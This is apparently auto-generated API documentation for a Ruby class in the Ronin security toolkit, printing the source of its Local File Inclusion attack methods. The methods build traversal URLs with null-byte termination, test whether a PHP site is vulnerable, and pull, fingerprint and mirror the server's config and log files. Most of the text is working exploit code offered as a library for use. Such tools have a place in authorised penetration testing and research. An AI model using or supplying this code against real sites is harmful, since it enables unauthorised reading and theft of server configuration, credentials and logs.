Class: Ronin::PHP::LFI

Inherits:
Object
  • Object
show all
Defined in:
lib/ronin/php/lfi/lfi.rb,
lib/ronin/php/lfi/file.rb,
lib/ronin/php/lfi/target.rb,
lib/ronin/php/lfi/exceptions/unknown_target.rb

Defined Under Namespace

Classes: File, Target, UnknownTarget

Constant Summary collapse

MAX_UP =

Maximum number of directories to escape

15

Instance Attribute Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(url, param, options = {}) ⇒ LFI

Creates a new LFI object with the specified url, param and the given options. The specified param indicates which query param in the url is vulnerable to Local File Inclusion.

options may contain the following keys:

:prefix

The path prefix.

:up

The number of directories to transverse up. Defaults to 0.

:terminate

Whether or not to terminate the LFI path with a null byte. Defaults to true.

:os

The Operating System to target.



69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
 
# File 'lib/ronin/php/lfi/lfi.rb', line 69

def initialize(url,param,options={})
  @url = url
  @param = param

  @prefix = options[:prefix]
  @up = (options[:up] || 0)

  if options.has_key?(:terminate)
    @terminate = options[:terminate]
  else
    @terminate = true
  end

  @os = options[:os]
end

Instance Attribute Details

#osObject

Targeted Operating System (OS)



54
55
56
 
# File 'lib/ronin/php/lfi/lfi.rb', line 54

def os
  @os
end

#paramObject

The vulnerable query param



42
43
44
 
# File 'lib/ronin/php/lfi/lfi.rb', line 42

def param
  @param
end

#prefixObject

The path prefix



45
46
47
 
# File 'lib/ronin/php/lfi/lfi.rb', line 45

def prefix
  @prefix
end

#terminateObject

Whether to terminate the LFI path with a null byte



51
52
53
 
# File 'lib/ronin/php/lfi/lfi.rb', line 51

def terminate
  @terminate
end

#upObject

Number of directories to traverse up



48
49
50
 
# File 'lib/ronin/php/lfi/lfi.rb', line 48

def up
  @up
end

#urlObject (readonly)

The URL which is vulnerable



39
40
41
 
# File 'lib/ronin/php/lfi/lfi.rb', line 39

def url
  @url
end

Instance Method Details

#fingerprint(options = {}) ⇒ Object

Extracts information from all targeted files using the given options.

options may include the following options:

:oses

The Array of OSes to test for.



191
192
193
194
195
196
197
198
199
200
201
 
# File 'lib/ronin/php/lfi/lfi.rb', line 191

def fingerprint(options={})
  data = {}

  Target.with_extractors.each do |target|
    inclusion_of(target,options) do |file|
      data.merge!(target.extract_from(file.contents))
    end
  end

  return data
end

#get(path, options = {}) ⇒ Object

Get the specified path with the given options.



110
111
112
113
114
115
116
117
118
 
# File 'lib/ronin/php/lfi/lfi.rb', line 110

def get(path,options={})
  options = options.merge(:url => url_for(path))

  if options[:method] == :post
    return Net.http_post_body(options)
  else
    return Net.http_get_body(options)
  end
end

#include(path, options = {}) ⇒ Object

Include the specified path with the given options. Returns a new File object for the included path.



124
125
126
 
# File 'lib/ronin/php/lfi/lfi.rb', line 124

def include(path,options={})
  File.new(path,get(path,options))
end

#include_target(name, options = {}, &block) ⇒ Object

Include a targeted file specified by name using the given options. Returns a new File object for the included file. If a block is given, it will be passed the newly created File object.



134
135
136
137
138
139
140
141
142
143
 
# File 'lib/ronin/php/lfi/lfi.rb', line 134

def include_target(name,options={},&block)
  name = name.to_s
  target = Target.with_file(name)

  unless target
    raise(UnknownTarget,"unknown target file #{name.dump}",caller)
  end

  return inclusion_of(target,options,&block)
end

#include_targets(options = {}, &block) ⇒ Object

Includes all targeted config and log files with the given options.



154
155
156
157
158
 
# File 'lib/ronin/php/lfi/lfi.rb', line 154

def include_targets(options={},&block)
  (Target.configs + Target.logs).map { |target|
    include_of(target,options,&block)
  }.compact
end

#mirror_targets(directory, options = {}) ⇒ Object

Mirrors all targeted config and log files to the specifed directory using the given options.



164
165
166
167
168
 
# File 'lib/ronin/php/lfi/lfi.rb', line 164

def mirror_targets(directory,options={})
  include_targets(options).map do |file|
    file.mirror(directory)
  end
end

#save_target(name, dest, options = {}) ⇒ Object 



145
146
147
148
149
 
# File 'lib/ronin/php/lfi/lfi.rb', line 145

def save_target(name,dest,options={})
  include_target(name,options) do |file|
    file.save(dest)
  end
end

#terminate?Boolean

Returns true if the LFI path will be terminated with a null byte, returns false otherwise.

Returns:

  • (Boolean) 


89
90
91
 
# File 'lib/ronin/php/lfi/lfi.rb', line 89

def terminate?
  @terminate == true
end

#to_sObject

Returns the String form of the url.



206
207
208
 
# File 'lib/ronin/php/lfi/lfi.rb', line 206

def to_s
  @url.to_s
end

#url_for(path) ⇒ Object

Builds a LFI url to include the specified path.



96
97
98
99
100
101
102
103
104
105
 
# File 'lib/ronin/php/lfi/lfi.rb', line 96

def url_for(path)
  escape = (@prefix || Path.up(@up))
  full_path = escape.join(path.to_s)
  full_path = "#{full_path}\0" if terminate?

  new_url = URI(@url.to_s)
  new_url.query_params[@param.to_s] = full_path

  return new_url
end

#vulnerable?(options = {}) ⇒ Boolean

Returns true if the url is vulnerable to LFI, returns false otherwise.

Returns:

  • (Boolean) 


174
175
176
177
178
179
180
181
182
 
# File 'lib/ronin/php/lfi/lfi.rb', line 174

def vulnerable?(options={})
  Target.tests.each do |target|
    inclusion_of(target) do |file|
      return true
    end
  end

  return false
end